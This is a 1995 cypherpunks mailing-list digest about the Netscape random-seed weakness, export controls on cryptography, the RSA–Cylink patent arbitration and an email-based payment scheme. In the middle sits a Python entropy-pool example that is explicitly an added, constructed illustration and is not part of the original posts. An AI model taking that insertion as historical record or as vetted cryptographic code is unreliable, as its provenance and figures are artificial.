And since _I_ started all this trouble with a private e-mail to Futplex; I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be illegal to wear in front of non-Americans," from my reading a while back of the dense text of this silly law, [I'll spare all of you a quote of it, but there's text that MIGHT be interpreted that way.]

>The _reality_ is quite different, I think, and the "this shirt is illegal"
>hype is, in my opinion, just that, hyperbole.

I agree with Tim that actual enforcement of this silly a law is unlikely, especially in Ian's case right now, and *especially* during our US (election) "silly season," for obvious reasons. The availability of strong encryption is unlikely to be a major issue during this election cycle, despite Cypherpunk efforts, and enforcement of this dumb law would be a "gift" to those of us who think it should be. [I hope I'm wrong here, but I think you're safe, Ian.:)]

>Even hyperbull, too.

I wouldn't go *that* far, though. Poorly written, ambiguous, statist laws can be interpreted in any number of ways and for a variety of reasons having little (or nothing) to do with justice.
JMR

Regards,
Jim Ray

"Not everything that is faced can be changed, but nothing can be changed until it is faced." -- James Baldwin
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35 James Milton Ray
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________

From m5 at dev.tivoli.com Wed Sep 20 12:57:37 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 12:57:37 PDT
Subject: A message from Joe Six-Pack
Message-ID: <9509201957.AA10522@alpha>

Well, the original sender of this is actually anything but "Joe Six-Pack"; his taste in beer is well-developed, and he's no moron. This is, however, an interesting take on the Netscape thing from a non-cypherpunk. He came across the Community ConneXion press release and responded:

------- start of forwarded message (RFC 934 encapsulation) -------
From: XXXXX
Subject: Re: Fwd: HackNetscape promotion (fwd)

>For Immediate Release
>Contact: sameer at c2.org 510-601-9777
>
>COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS
>
>Sept 19 1995 - Community ConneXion ...

Am I the only one who finds this silly? All this fuss about credit card encryption is such BS. My totally unencrypted credit card number is in the hands of brain-dead minimum-wage waitrons and green-haired retail clerks dozens of times a week with no encryption.
Gas station attendants, restaurant clerks, supermarkets and banks have the number, and an unscrupulous type could use it and hose me at any time. I've had credit cards for 15 years and nothing like that has ever happened. If it does, I'm out $50 and a bunch of pain in the butt phone calls. So the thought of some geek with a LAN sniffer and too much time on his hands sucking simply encrypted numbers off the internet does not exactly make my heart go pitter-pat.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX     |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From perry at piermont.com Wed Sep 20 13:04:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 13:04:05 PDT
Subject: netscape bug
In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com>
Message-ID: <199509202002.QAA05425@frankenstein.piermont.com>

"Vladimir Z. Nuri" writes:
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?

You can guess the PID without much trouble -- they are 15 bit numbers.

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way.

That was one of the first wide exploits of the trick, yes.

> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the
> host machine?

Yes. However, it's very straightforward to do.
The recent syslog(3) problem was of this nature, by the way.

Perry

From alano at teleport.com Wed Sep 20 13:08:42 1995
From: alano at teleport.com (Alan Olsen)
Date: Wed, 20 Sep 95 13:08:42 PDT
Subject: Linking = Showing = Transferring?
Message-ID: <199509202008.NAA29083@desiree.teleport.com>

At 09:18 PM 9/20/95 +0200, you wrote:
>> Browser in the US, text in US, crypto gif imported from UK, both legal.
>>
>> Browser outside US, text in US, crypto gif imported from UK, both legal.
>>
>> See a flaw in that?
>
>Not directly, but... what if for some strange reason the image is routed
>through US gateways on its way from the UK to, for example, Germany?
>I mean, The Net (tm) is a strange beast, and you can rarely tell which way
>the message flows... you can't even DO anything about it.

It can get pretty weird. A friend did a traceroute on a site across town. It was relayed half-way across the world to get there. (Through Poland or some such absurdity.)

It seems that no matter what you do, you are breaking the law...

| Minister of Forced Caffinization in the DNRC    | alano at teleport.com |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!" | Ignore the man      |
|  -- PGP 2.6.2 key available on request --       | behind the keyboard.|
| http://www.teleport.com/~alano                  |                     |

From karlton at netscape.com Wed Sep 20 13:15:25 1995
From: karlton at netscape.com (Phil Karlton)
Date: Wed, 20 Sep 95 13:15:25 PDT
Subject: "random" number seeds vs. Netscape
Message-ID: <43psn2$6ug@tera.mcom.com>

Let me start off by saying that I speak for me and not Netscape. I also tend to be UNIX centric since I know very little (nothing?) about the internals of PCs and Macs.

I want to address the bug Netscape has with its currently released product with respect to seed generation. For the most part this is not a crypto issue, but rather a system issue. Those bits of entropy can only be gathered in a system dependent manner.
Assumption:

We are relying on the MD5 hash algorithm to gather the string of potentially unpredictable sequences. I am assuming that feeding known bits along with the unknown will not compromise the "randomness" of the MD5 state.

The basic idea is to feed a sequence of information into the MD5 hash, expecting that some of the bits for each sub-sequence would only be guessable. If we get enough unguessable bits into the mix, then the weak link in the chain would not be the seed generation.

Here is what the client will soon be doing:

Netscape is available on Macs, Win-16 and Win-32 versions and 8 different UNIX platforms. The exact details for each platform are quite system specific. The basic idea is to feed a sequence of information into the MD5 hash, expecting that some of the bits for each sub-sequence would be unguessable.

At program start

On all platforms:

    Start with the contents of the highest resolution clock we can find on the system. [For instance, an R4000 MIPS processor has a free-running instruction counter. At 100 MHz this gets incremented every 10 nano-seconds. There are probably a good 20 bits of unguessable value there.] On Macs and Win* systems there are "tick" counters that update 60 (or maybe only 16) times a second.

    We then push through the time of day, because on some systems, the microsecond part of a time_val has some bits that are only guessable.

For UNIX we feed the following into the MD5 hash:

    ps (-el or aux depending upon system)
    netstat -ni & netstat -na
    the user's environment. (We will certainly use this as well in the 2.0 release. The truly paranoid will be able to run whatever seed generator they want and stick the result into their environment. How you protect your environment from attack is up to you. ;-)
    System specific info such as hardware serial number or system id.

If you have specific suggestions for any particular OS/hardware pair, please let me know.
For PCs

    Cursor position
    Global memory status
    FreeSpace
    Drive configuration
    Number of running tasks
    Environment strings
    UUIDCreate if there is an ethernet card
    Clipboard owner and contents
    Current process, processID and window
    Free clusters on the disk

For MACs:

    Machine location (longitude and latitude)
    User name
    Mouse location
    keyboard time threshold
    last key pressed
    audio volume
    current directory
    current process
    process information for every task on the system
    stack limits
    zones
    scrap sizes and counts
    event queue

And then on all platforms

    The stat (file access, creation, modify times, size, inode equivalent) and contents of a number of "interesting" files. [Where is the PGP random number state file stored?]
    A portion of the contents of the screen.
    And finally, the contents of the highest resolution clock we can find.

Each time the client goes idle

    Reinitialize the seed with the most recent user event (probably a button or key down) along with the mouse position, and relatively high resolution clocks.

Known weaknesses:

If your X display is not the local machine then the X protocol can be watched. Given that, the data for the reseeding of the MD5 hash will be compromised. [Any scheme that relies on random user input to generate a seed suffers from the same problem.] This is not quite as bad as it might be. The exact time of the client becoming idle can only be guessed. We should be able to get a few unguessable bits from the microsecond part of the time-of-day clock each time. Enough cycles of user actions should help to make the hash less subject to a brute force attack.

In fact, the entire X protocol issue is one that could take up another 3 pages. An SSLized version of the server would help, but how would anybody export it? You "xhost +" fans are doomed.

If the user launches the client to a secure home page then there will be no user actions involved before the first need for a seed.
Thoughts on guessing:

If Eve has root access to the user's workstation, all bets are off. Replacement of one of the system libraries or patching the client executable are among the attacks that would make it trivial to breach any part of the security. Specific measures (like computing a hash over the text of the program) could help against some of these attacks, but it is not realistic to believe that we can prevent the attack from a sophisticated person with root access.

Multi-user Unix machines present a special problem. There are those at Netscape that argue that anybody who has login access to your machine may as well be considered to have root access. There are enough known attacks that this is true to a large extent. However, I think we can do better than just giving up. Unfortunately most of the sources of entropy available to the client are also available to the attacker. For instance, the output of "ps" is not much help against this form of attacker. As Jeff Weinstein said earlier and I echo here: specific suggestions are more than welcome.

When Eve has access to the wire for all of the packets into and out of the user's workstation, then some of the networking information can be guessed. See above about known weaknesses if Eve has access to the X protocol stream.

I am most comfortable about the "randomness" of the generated seed if Eve is outside a fire wall sniffing packets. The difficulty in guessing what processes/tasks are running on the target machine is quite a bit of help here.

What I would like:

Any OS has access to a number of real-world physical sources of randomness. This information is not made available to a user level process. How long did that last seek take? Was there any noise on the microphone? It would be good if the OS could gather that information and make some set of bits available to any process that asks. Having this be part of all OSes would make my job easier.
More specifically: A "getnoise()" system call in UNIX could be better than anything I can do and easier. Can we convince the UNIX vendors to start providing that?

My life would have been simpler if this attack had been done after the 2.0 version of the client had been released. :-) Believe it or not, we were beginning to beef up the seed generation a couple of weeks ago. The time spent on patching the current release will not all go to waste, but it has cut down on my limited opportunities to sleep.

For those that are curious: being responsible for helping to fix a bug that is getting front page coverage in major newspapers is not nearly as much fun as it sounds.

PK
--
Philip L. Karlton                    karlton at netscape.com
Principal Curmudgeon                 http://www.netscape.com/people/karlton
Netscape Communications Corporation

From perry at piermont.com Wed Sep 20 13:16:18 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 13:16:18 PDT
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <199509201928.MAA20230@netcom16.netcom.com>
Message-ID: <199509202015.QAA05462@frankenstein.piermont.com>

"Vladimir Z. Nuri" writes:
> I'm going to argue against TCM and others who are opposed to a
> "cypherpunk press release" because this is not an "organized group".

Look, L. (may I call you L.?) -- we've gone over this many times. We aren't a group. We're a mailing list. We've got a diversity of opinions, and we have no organization -- nor do we want one.

> anyone who wants to issue press releases for the "cypherpunks", I say,
> GO FOR IT.

Except for the fact that it would more or less be a lie. There is no "cypherpunks" position, so you can't release anything on the subject.

> this is such a great idea that *I* may do it if nobody does it after
> a week or two.

I thought your last attempts at such stuff were dismal failures.
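Karlton's seed-gathering plan above, together with the rule Perry Metzger states in his reply later in this digest (get at least 128 bits of real entropy into the MD5 before any seed comes out, and credit identifying data such as serial numbers and user names with none), as an added Python example that is not Netscape's code and not from either poster. The source labels, sample values, event records and per-source entropy estimates are constructed for illustration.

```python
import hashlib
import struct

# Added example, not Netscape's code: an MD5 seed pool in the shape Karlton
# describes, with the entropy budget Perry insists on (128 bits in before any
# seed comes out). Source labels, values and entropy estimates are constructed.


class SeedPool:
    """Hashes every source through MD5 and tracks a conservative estimate of
    how many unguessable bits have gone in."""

    def __init__(self, required_bits=128):
        self._md5 = hashlib.md5()
        self.estimated_bits = 0
        self.required_bits = required_bits

    def mix(self, label, data, estimated_bits):
        """Feed one source. Known or constant data is still hashed (harmless,
        per Karlton's assumption) but is credited with zero entropy."""
        if isinstance(data, str):
            data = data.encode()
        # Length-prefix label and data so adjacent sources cannot blur together.
        self._md5.update(struct.pack(">I", len(label)) + label.encode())
        self._md5.update(struct.pack(">I", len(data)) + data)
        self.estimated_bits += max(0, estimated_bits)

    def ready(self):
        return self.estimated_bits >= self.required_bits

    def seed(self):
        """Return the 16-byte seed, or None if the entropy budget is not met."""
        if not self.ready():
            return None
        return self._md5.digest()


# Constructed stand-ins for sources from Karlton's list. Identifying data
# (serial number, user name, machine location) is exactly what Perry calls
# non-random: an attacker can know it, so it is credited with 0 bits.
CONSTANT_SOURCES = {
    "hardware serial": ("SN-CONSTRUCTED-0001", 0),
    "user name": ("alice", 0),
    "machine location": ("37.39N,122.06W", 0),
}


def mix_startup_sources(pool, hires_clock, tod_usec):
    """Program-start material: the high-resolution clock (Karlton's ~20-bit
    estimate for a free-running instruction counter) and the microsecond part
    of the time of day (only a few bits), plus the constant sources."""
    pool.mix("hires clock", struct.pack(">Q", hires_clock), 20)
    pool.mix("time of day usec", struct.pack(">I", tod_usec), 4)
    for label, (value, bits) in CONSTANT_SOURCES.items():
        pool.mix(label, value, bits)


def mix_user_event(pool, event_code, x, y, hires_clock):
    """Karlton's reseed-on-idle step: the most recent user event, the mouse
    position and a high-resolution clock. The position is visible to anyone
    watching the X stream; the fine clock bits are where the value is, so the
    whole record is credited with 8 bits (a constructed, conservative figure)."""
    payload = struct.pack(">BHHQ", event_code, x, y, hires_clock)
    pool.mix("user event", payload, 8)


# Constructed session: 13 button/key events with sub-millisecond timestamps.
SAMPLE_EVENTS = [
    (1, 100 + i, 200 + i, 0x1000 + 4096 * i + (i * 37) % 1000) for i in range(13)
]


def seed_from_session(events):
    """Build a seed from constructed startup sources plus a list of
    (event_code, x, y, hires_clock) records. Returns (hex seed or None, bits)."""
    pool = SeedPool()
    mix_startup_sources(pool, hires_clock=0x123456789ABC, tod_usec=918273)
    for event in events:
        mix_user_event(pool, *event)
    seed = pool.seed()
    return (seed.hex() if seed else None), pool.estimated_bits


def constants_only_bits():
    """What the constant sources alone buy you: a digest, but zero entropy."""
    pool = SeedPool()
    for label, (value, bits) in CONSTANT_SOURCES.items():
        pool.mix(label, value, bits)
    return pool.estimated_bits, pool.ready()


if __name__ == "__main__":
    print("constants only:", constants_only_bits())            # (0, False)
    print("12 events:", seed_from_session(SAMPLE_EVENTS[:12]))  # (None, 120)
    print("13 events:", seed_from_session(SAMPLE_EVENTS))       # (<32 hex chars>, 128)
```

With 24 bits credited at startup, the pool refuses to hand out a seed until thirteen user events have been mixed in; the constant sources change the digest but never the count.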
.pm

From schneier at winternet.com Wed Sep 20 13:38:31 1995
From: schneier at winternet.com (Bruce Schneier)
Date: Wed, 20 Sep 95 13:38:31 PDT
Subject: PKP Lawsuit Settled: Both Sides Claim Victory
Message-ID: <199509202038.PAA13656@icicle>

It looks as though the PKP suit is finally over, with both sides claiming victory. Is the decision public? Can someone in California get a copy of it and find out what really was decided?

Bruce

*****************************************************************************

SUNNYVALE, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--An Arbitration Panel has determined that RSA Data Security Inc. licensed software products, practicing public-key technology to third parties without the legal rights necessary to the patents covering the technology. The decision, issued on Sept. 6, 1995, came in a binding arbitration between RSA and CYLINK Corp., which formed the partnership known as Public Key Partners (PKP) on April 6, 1990. The purpose of forming PKP was to establish a security standard and jointly license security patents to leading vendors in the high-tech industry. CYLINK has indicated that it will enforce the binding decision in Federal Court.

"The ruling exposes every one of RSA's OEM customers -- from the time PKP was formed in 1990 until the patents expire -- to the liability for patent infringement," said Robert Fougner, general counsel, CYLINK. "Because of the widespread interest in public key technology, this ruling has enormous implications for the entire high-tech industry, impacting the future of all electronic information exchanges including electronic commerce and banking. The panel's decision vindicates our position that RSA Security Inc. has been improperly licensing technology which they did not have the necessary rights to."

The fundamental patents covering public key technology (Merkle-Hellman and Rivest-Shamir-Adleman) had been held by the PKP partnership since 1990. Effective Sept.
6, 1995, however, the arbitration ruled that PKP was dissolved and the broadest of the public key patents (invented at Stanford University and which cover all known implementations of public key technology) revert from PKP back to CYLINK.

The panel further ruled that RSA Data Security Inc. could not grant its software customers the right to make any copies of RSA-authored software implementing Stanford public key technology. In an order issued Sept. 12, 1995, the arbitrators said that "the intent of the order is to clarify that to the extent a (RSA software) licensee makes copies of the code (whether source or object), it is not protected as a result of the order from a claim that the making of such copies is a `making' under the patent laws upon which a claim for infringement of the Stanford patents can be based."

"Cylink will assert the rights to the Stanford patents vigorously," said David Morris, vice president of marketing, CYLINK. "The inventors of public key cryptography, especially Martin Hellman of Stanford University, have never gotten a fair return for their ground breaking invention. Since the formation of PKP, RSA Data Security Inc. had been granting software rights which allowed licensees to copy and modify the programs, but without paying PKP or the inventors a royalty for those rights."

Arbitration Ruling

The Stanford University patents include the Hellman-Merkle patent, the first public key patent making the broadest claim of cryptography, a security technique that ensures privacy, authentication and the integrity of electronic information. Because the Hellman-Merkle patent claims cover all implementations of public key techniques, including the techniques known as RSA.
To avoid risk of a patent infringement suit under the Stanford patents, any vendor who has purchased a license from RSA since April 6, 1990, or is contemplating the purchase of an RSA license and is distributing software or hardware covered by the Stanford University patents, must now obtain a license to the Hellman-Merkle patent from CYLINK for their continued use. Customers who would like to contact CYLINK about existing and future licenses should call Robert Fougner, General Counsel, at 408/735-5800.

Background Information:

On April 6, 1990, RSA and CYLINK formed PKP to establish a security standard, and jointly license security patents to leading vendors in the high-tech industry. The security technology business is unusual in that it is based on patents to which only these two companies have rights. The patents originally developed at Stanford University (Diffie-Hellman, Hellman-Merkle and Hellman-Pohlig) broadly claim the invention of public-key cryptography. Another patent, invented at MIT (Rivest-Shamir-Adleman) claims a particular implementation of public key cryptography using the algorithm known as "RSA."

In 1994, CYLINK initiated the arbitration against RSA, claiming that RSA's licensing practices exceeded RSA's rights under the patents and violated the agreements forming PKP. CYLINK further claimed that it was denied a promised license to the RSA patent when PKP was formed. Among other rulings, the arbitrators ruled that an April 1990 document grants CYLINK a patent license to the RSA patent.

CYLINK Corp. is the world's largest provider of enterprise-wide network information security products and wireless communications. Headquartered in Sunnyvale, CYLINK serves Fortune 500 companies, multinational financial institutions and many international government agencies.
--30--crd/sf* jar/sf

CONTACT: Cylink Corporation, Sunnyvale
Kim Rose, 408/774-6447

***************************************************************************

REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An Arbitration Panel recently ruled that Cylink does not have a license to RSA patented technology, that RSA's software licensing practices do not breach any agreement with Cylink or its wholly owned subsidiary Caro-Kann and that RSA now has the exclusive right to license the RSA patent.

In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by agreement of the parties, and after nearly a month of testimony, ruled in favor of RSA on every significant issue. The Panel held that neither Cylink nor Caro-Kann had a license to practice RSA patented technology. Cylink admittedly incorporates this technology in its Secure X.25 product line, without any license to do so. The Panel also found that RSA's software licensing practices did not materially breach any of Cylink's rights. The Panel did not rule that anyone, (specifically including RSA and its software customers) infringed any existing patent rights of anyone - including Cylink.

As a result of the Panel's ruling, RSA now has the exclusive right to license the patented RSA technology. According to Jim Bidzos, the President of RSA, "RSA will continue to conduct its software business in exactly the same way that it has for the past ten years.

"In addition, RSA anticipates that licenses to the RSA Patent will now be much more readily available, because they can now be granted without Cylink interference. RSA has all of the intellectual property rights which it needs to license its software. RSA will vigorously defend against any claim to the contrary."

A recent Cylink press release on the Ruling of the Arbitration Panel is wildly inaccurate.
The same Robert Fougner (Cylink's General Counsel) who is cited in the Cylink press release has repeatedly made express representations to third parties that the Stanford Patents do not cover, and are not infringed by, the manufacture, use or sale of products incorporating RSA's TIPEM software developer's toolkit.

As noted by Mr. Bidzos: "Cylink lost every single significant issue in the Arbitration. Their press release was simply an attempt to cover up what has been a crushing defeat."

Questions regarding the Arbitration Panel Ruling or RSA licenses should be directed to Kurt Stammberger, RSA Technology Marketing Manager, or Paul Livesay, RSA Director of Legal Affairs.

--30--as/sf*

CONTACT: RSA
Kurt Stammberger, 415/595-8782
kurt at rsa.com

From kinney at bogart.Colorado.EDU Wed Sep 20 13:42:25 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Wed, 20 Sep 95 13:42:25 PDT
Subject: MacRandoms
Message-ID: <199509202042.OAA16124@bogart.Colorado.EDU>

I've uploaded the cryptographic random number code for the Mac to

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

This file contains Colin Plumb's randpool code, my Macintosh wrapper for it, and a nice 68K assembler implementation of MD5. Enjoy.

(Sorry if this has gotten posted twice, but my original post seems to have disappeared.)

-- Will

From LFWS37A at prodigy.com Wed Sep 20 13:56:42 1995
From: LFWS37A at prodigy.com (MR STEVE R KELL)
Date: Wed, 20 Sep 95 13:56:42 PDT
Subject: software
Message-ID: <013.01607783.LFWS37A@prodigy.com>

I need new crypt software w/instruction if possible.

lfws37a at prodigy.com

From perry at piermont.com Wed Sep 20 14:02:02 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 14:02:02 PDT
Subject: "random" number seeds vs.
Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509202101.RAA05534@frankenstein.piermont.com>

Phil Karlton writes:
> I want to address the bug Netscape has with its currently released
> product with respect to seed generation. For the most part this is not
> a crypto issue, but rather a system issue. Those bits of entropy can
> only be gathered in a system dependent manner.

Quite true.

> Assumption:
> The basic idea is to feed a sequence of information into the MD5
> hash, expecting that some of the bits for each sub-sequence would
> only be guessable. If we get enough unguessable bits into the mix,
> then the weak link in the chain would not be the seed generation.

This is true. However, you must get 128 bits of entropy into the MD5 -- this can be accompanied by as much junk as you like, but if there are at least 128 bits of entropy fed in, the MD5 process will distil it into what you want. You might want to read RFC 1750, and examine the code PGP uses for doing its random generation. Clients do lots of fairly random things while talking to netscape (click and keyboard press times, etc) that can be incorporated in, along with other sources of bits. You should grab bits wherever you can and keep them for when you need them, as getting 128 bits takes a while.

> On Macs and Win* systems
> there are "tick" counters that update 60 (or maybe only 16)
> times a second.

PC timers inherently run at MHz speed -- they interrupt every 100th of a second but you can get finer resolution by querying the clock chip. Does Windows let you do this?

By the way, starting with the time that the program was started is okay but not great -- I think you probably can only safely assume a few bits from this.

> For UNIX we feed the following into the MD5 hash:
>
> ps (-el or aux depending upon system)

I wouldn't do that, since it forces you to have a dependency on executing a subprocess.
Were I you, I'd capture the timer on every single keystroke and mouse click event and feed that in to your entropy generator a la PGP.

> System specific info such as hardware serial number or
> system id.

By definition, that isn't random. Don't use it.

There are other things you can mix in, besides keystroke and mouse timings and positions, like system call timings for things that might take a bit of time.

I can't speak to things on PCs, but...

> UUIDCreate if there is an ethernet card

No, sorry, this is very non-random.

> For MACs:
> Machine location (longitude and latitude)

Non-random.

> User name

Non-random.

> audio volume

Doesn't change very often.

> Known weaknesses:
>
> If your X display is not the local machine then the X protocol can
> be watched. Given that, the data for the reseeding of the MD5 hash
> will be compromised. [Any scheme that relies on random user input
> to generate a seed suffers from the same problem.]

That's true, but it's better than it could be, and most users will be running local.

> In fact, the entire X protocol issue is one that could take up
> another 3 pages. An SSLized version of the server would help,
> but how would anybody export it? You "xhost +" fans are doomed.

You guys should quit thinking of SSL as a good idea. It might be that the concept is useful for backward compatibility, but don't think of it as the universal solution just because you developed it.

> Multi-user Unix machines present a special problem. There are those
> at Netscape that argue that anybody who has login access to your
> machine may as well be considered to have root access. There are
> enough known attacks that this is true to a large extent. However,
> I think we can do better than just giving up.

I agree. Don't run on the assumption that everyone has root -- otherwise you'll build something that produces less safety than it could.

> What I would like:
>
> Any OS has access to a number of real-world physical sources of
> randomness.
> This information is not made available to a user level
> process. How long did that last seek take? Was there any noise on
> the microphone? It would be good if the OS could gather that
> information and make some set of bits available to any process that
> asks. Having this be part of all OSes would make my job easier.
>
> More specifically: A "getnoise()" system call in UNIX could be
> better than anything I can do and easier. Can we convince the UNIX
> vendors to start providing that?

Actually, Ted Ts'o built a /dev/rand for Linux, and there are people trying to port it to other platforms. This is probably a better idea than a system call.

> For those that are curious: being responsible for helping to fix a bug that
> is getting front page coverage in major newspapers is not nearly as
> much fun as it sounds.

I've lost my share of nights to security holes announced late in the day that HAD to be fixed for clients within hours. Welcome to the real world. You play with the big boys and you get big headaches every once in a while.

Perry

From carolann at censored.org Wed Sep 20 14:06:30 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 14:06:30 PDT
Subject: Netscape closes up 1 3/8 today!
Message-ID: <199509202104.OAA16664@usr2.primenet.com>

Lookit that! 416 trades and 11 times there was more buying pressure than selling pressure. The rumors of bug fix are outweighing the facts of the crack! I am totally amazed! But think company insiders are probably supporting the stock. Holding up better than ascii armor, it is.
NSCP is currently trading at $54 3/4

Symbol         : NSCP
Exchange       : NASDAQ
Description    : NETSCAPE COMMUNICATIONS CORP COM
Last Traded at : 54 3/4
Date/Time      : Sep 20 4:01
$ Change       : 1 3/8
% Change       : 2.576113
Bid            : 54 3/4
Ask            : 55 1/4
Volume         : 310500
# of Trades    : 416
Opening Price  : 53 1/2
Last Shares    : 8
Day Low        : 53 1/4
Day High       : 55 1/4
52 Week Low    : 45 3/4
52 Week High   : 74 3/4

--
Member Internet Society - Certified BETSI Programmer - Webmistress
***********************************************************************
Carol Anne Braddock (cab8)   carolann at censored.org   206.42.112.96
My Homepage   The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
http://dcs.ex.ac.uk/~aba/export/

From cme at TIS.COM Wed Sep 20 14:09:11 1995
From: cme at TIS.COM (Carl Ellison)
Date: Wed, 20 Sep 95 14:09:11 PDT
Subject: My new perspective on ITAR (was Re: Munitions shirt (again))
In-Reply-To:
Message-ID: <9509202056.AA14060@tis.com>

>Date: Wed, 20 Sep 1995 15:26:08 -0400 (EDT)
>From: "K. M. Ellis"

[re. wearing an RSA T-shirt in the presence of furreners]

The CRYPTO conference sounds like a better alleged violation of export -- unless you take your shirt off and give it to the furrener or lie down on his scanner to scan your bar codes (or maybe let him take a picture of the bar codes). :-)

It was the late 70's when an over-enthusiastic person from NSA complained to the IEEE that it was about to hold a conference including foreign nationals at which crypto would be discussed. This is clearly in violation of the ITAR (dissemination of controlled technical data). The IEEE generally thumbed its nose at the NSA person and shortly thereafter (1980) the IACR was founded and CRYPTO conferences were held. CRYPTO includes multiple attendees from the crypto services of (former) (?current?) unfriendly governments.
(is France friendly? :-) It also has multiple NSA attendees -- so it's not going on in secret from the gov't.

>I might add, however, that two days ago I wore my RSA shirt to my sound
>design class, where the guy I happened to sit down next to recognized it,
>was familiar with what it stood for, and knew all about the Zimmermann
>case; not because he was a crypto enthusiast or a comp sci major, but
>because he works for customs at Baltimore-Washington International
>Airport.
>
>This event really changed my point of view considering ITAR... I figured
>that it was just one of those dumb laws that _nobody_ really paid much
>attention to except for the FBI and that was only because they were
>looking for a way to nail Zimmermann for writing good crypto. I had
>assumed that ITAR was something that customs agents/L. E. O's/etc.
>learned about, took a test on it, then forgot about it the next day.
>
>Interesting... they _really_ are serious, aren't they?

Well ... I was at an AFCEA talk about export rules about 1.5 years ago and met a special agent from Customs. I asked him for Customs' policy on export of crypto S/W and technical data by USENET News, FTP and WWW. He seemed very interested -- wanted my phone number -- was going to come out to visit to see these sites offering this stuff.

He never came out. I started e-mailing him asking him whether he was going to come get a tour of the net -- and he stopped replying.

I can only assume that when he thought it was a single incident (like PRZ) which could be tracked, he might follow it -- but when I started talking about dozens or hundreds of people involved (e.g., all US persons talking crypto techniques on sci.crypt) he lost interest.

I was going to show him the MIT and TIS sites which release crypto code. (Those sites have letters from the State Dept. saying that what we do to restrict export is OK -- even if it is the honor system.) I was going to show him how easy it is to get crypto from overseas.
As I said, he lost interest.

- Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison          cme at acm.org          http://www.clark.net/pub/cme |
|PGP: E0414C79B5AF36750217BC1A57386478  &  61E2DE7FCB9D7984E9C8048BA63221A2 |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+

From sameer at c2.org Wed Sep 20 14:26:10 1995
From: sameer at c2.org (sameer)
Date: Wed, 20 Sep 95 14:26:10 PDT
Subject: "random" number seeds vs. Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509202120.OAA28581@infinity.c2.org>

> weeks ago. The time spent on patching the current release will not
> all go to waste, but it has cut down on my limited opportunities to
> sleep.
>
> For those that are curious: being responsible for helping to fix a bug that
> is getting front page coverage in major newspapers is not nearly as
> much fun as it sounds.
>

This looks really good. I only wish your PR people wouldn't spout the garbage that they do.

In terms of your amounts of sleep-- If netscape had waited a month before releasing the patch it would not have been doing any worse than most OS vendors. Netscape is to be congratulated on the quick response.

--
sameer                                Voice:   510-601-9777
Community ConneXion                   FAX:     510-601-9734
An Internet Privacy Provider          Dialin:  510-658-6376
http://www.c2.org (or login as "guest")        sameer at c2.org

From dl at hplyot.obspm.fr Wed Sep 20 14:28:37 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Wed, 20 Sep 95 14:28:37 PDT
Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To:
Message-ID: <9509202127.AA07988@hplyot.obspm.fr>

Robert Hettinga writes:
> --- begin forwarded text
[...]
> Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT)
> From: Nathaniel Borenstein
> To: www-buyinfo at allegra.att.com
> Subject: Re: Security Flaw Is Discovered In Software Used in Shopping
> [...]
> For information on a safe, non-cryptographic alternative that has been
> fully operational for nearly a year, with over 30,000 paying customers,
> a growth rate featuring a six week doubling period, and NO break-ins to
> date, check out http://www.fv.com. -- Nathaniel

After some research on the above advertised site:

" If you can talk to FIRST VIRTUAL via electronic mail, and nobody else can read or reply to your E-mail, then your E-mail account is compatible with FIRST VIRTUAL. "

Wonderful, this makes about ***nobody***

Are those folks stupid enough to think that using clear text mail is something reasonable!!! Better use even netscape 1.1 export!

(basically their 'trick' is that you send your CC# by phone, they then give you an "id" by clear text EMAIL that allows you to shop (you and all the folks that can intercept your mails); shopping is confirmed by sending you a clear (!) mail, that you need to answer with "YES" "NO" or "FRAUD" (!!) very funny system.... I imagine the poor fooled customer bills...

Probably a lawyer devised the above statement so if people get charged with things they didn't ask for, fir$t virtual will answer they were at fault because "someone" can read their mail (even if the someone is the hacker around FV's mail exchanger...)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
